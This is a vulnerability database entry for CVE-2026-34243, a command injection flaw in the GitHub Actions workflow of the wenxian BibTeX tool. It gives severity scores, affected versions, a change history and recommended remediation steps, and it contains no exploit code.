CVE-2026-34243 - Vulnerability Details

- wenxian: Command Injection in GitHub Actions Workflow via `issue_comment.body`

Description

wenxian is a tool to generate BIBTEX files from given identifiers (DOI, PMID, arXiv ID, or paper title). In versions 0.3.1 and prior, a GitHub Actions workflow uses untrusted user input from issue_comment.body directly inside a shell command, allowing potential command injection and arbitrary code execution on the runner. At time of publication, there are no publicly available patches.

Published: 2026-03-31

Score: 9.8 Critical

EPSS: < 1% Very Low

KEV: No

Impact:

Action:

Analysis

Impact

Untrusted content from issue_comment.body is used directly in a shell command in the GitHub Actions workflow of wenxian. The flaw permits an attacker to inject arbitrary shell commands that run on the workflow runner, leading to remote code execution. This vulnerability aligns with CWE‑77 and CWE‑78.

Affected Systems

The affected product is wenxian, a BibTeX generation tool developed by njzjz. Versions 0.3.1 and all earlier releases contain the flaw. The tool is hosted on GitHub and its workflow runs in the context of the repository’s GitHub Actions runners.

Risk and Exploitability

The CVSS score is 9.8, indicating a high severity for remote execution. The EPSS score is below 1%, so the overall probability of exploitation in the wild appears low, yet the public nature of the workflow and the minimal requirement of an issue comment mean an attacker can readily trigger it. The vulnerability is not yet listed in CISA’s KEV catalog. The likely attack vector is any user able to post or modify an issue comment in the repository, which the workflow then processes without validation.

Default status is the baseline for the product, each version can override it (e.g. patched versions marked unaffected).

Vendor Product Default status Versions

njzjz

wenxian

affected

Version	Status	Constraints
`<= 0.3.1`	affected	—

Configuration 1 [-]

cpe:2.3:a:njzjz:wenxian:*:*:*:*:*:python:*:*

No data.

Vendor Product Confidence Versions

Njzjz

Wenxian

100%

Version	Status	Scheme	Platform
`[0,0.3.1]`	affected	semver	—

Found an issue or want to improve our Enrichment? You can suggest it directly by opening an issue on our dedicated GitHub repository .

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

Identify and disable all GitHub Actions workflows that invoke wenxian until a fix is available
Remove the direct use of issue_comment.body in shell commands or apply strict sanitization before execution
Monitor repository issue comments for suspicious content and block malicious comments
Check the project’s repository for a newer release of wenxian that addresses the issue and upgrade immediately
If no patch is forthcoming, consider replacing wenxian with an alternative tool that does not expose a command injection vector

Generated by OpenCVE AI on April 3, 2026 at 17:51 UTC.

Tracking

Sign in to view the affected projects.

Advisories

Source	ID	Title
Github GHSA	GHSA-r4fj-r33x-8v88	wenxian: Command Injection in GitHub Actions Workflow via `issue_comment.body`

No CVSS v4.0

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

The EPSS score is 0.00078.

Exploitation poc

Automatable yes

Technical Impact total

References

Link	Providers
https://github.com/njzjz/wenxian/security/advisories/GHSA-r4fj-r33x-8v88

History

Fri, 03 Apr 2026 15:15:00 +0000

Type	Values Removed	Values Added
CPEs		cpe:2.3:a:njzjz:wenxian::::::python::*

Thu, 02 Apr 2026 20:30:00 +0000

Type	Values Removed	Values Added
Metrics		ssvc `{'options': {'Automatable': 'yes', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}`

Wed, 01 Apr 2026 02:15:00 +0000

Type	Values Removed	Values Added
First Time appeared		Njzjz Njzjz wenxian
Vendors & Products		Njzjz Njzjz wenxian

Tue, 31 Mar 2026 16:15:00 +0000

Type	Values Removed	Values Added
Description		wenxian is a tool to generate BIBTEX files from given identifiers (DOI, PMID, arXiv ID, or paper title). In versions 0.3.1 and prior, a GitHub Actions workflow uses untrusted user input from issue_comment.body directly inside a shell command, allowing potential command injection and arbitrary code execution on the runner. At time of publication, there are no publicly available patches.
Title		wenxian: Command Injection in GitHub Actions Workflow via `issue_comment.body`
Weaknesses		CWE-77 CWE-78
References		https://github.com/njzjz/wenxian/security/advisories/GHSA-r4fj-r33x-8v88
Metrics		cvssV3_1 `{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}`

Subscriptions

Njzjz Wenxian

MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published: 2026-03-31T15:49:27.333Z

Updated: 2026-04-02T15:21:36.168Z

Reserved: 2026-03-26T16:22:29.034Z

Link: CVE-2026-34243

Vulnrichment

Updated: 2026-04-02T15:21:32.144Z

NVD

Status : Analyzed

Published: 2026-03-31T16:16:33.253

Modified: 2026-04-03T14:38:17.593

Link: CVE-2026-34243

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-03T21:17:33Z

Weaknesses

Impact

Affected Systems

Risk and Exploitability

Tracking

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

Exploitation poc

Automatable yes

Technical Impact total

Subscriptions

JSON object

JSON object

JSON object

JSON object

JSON object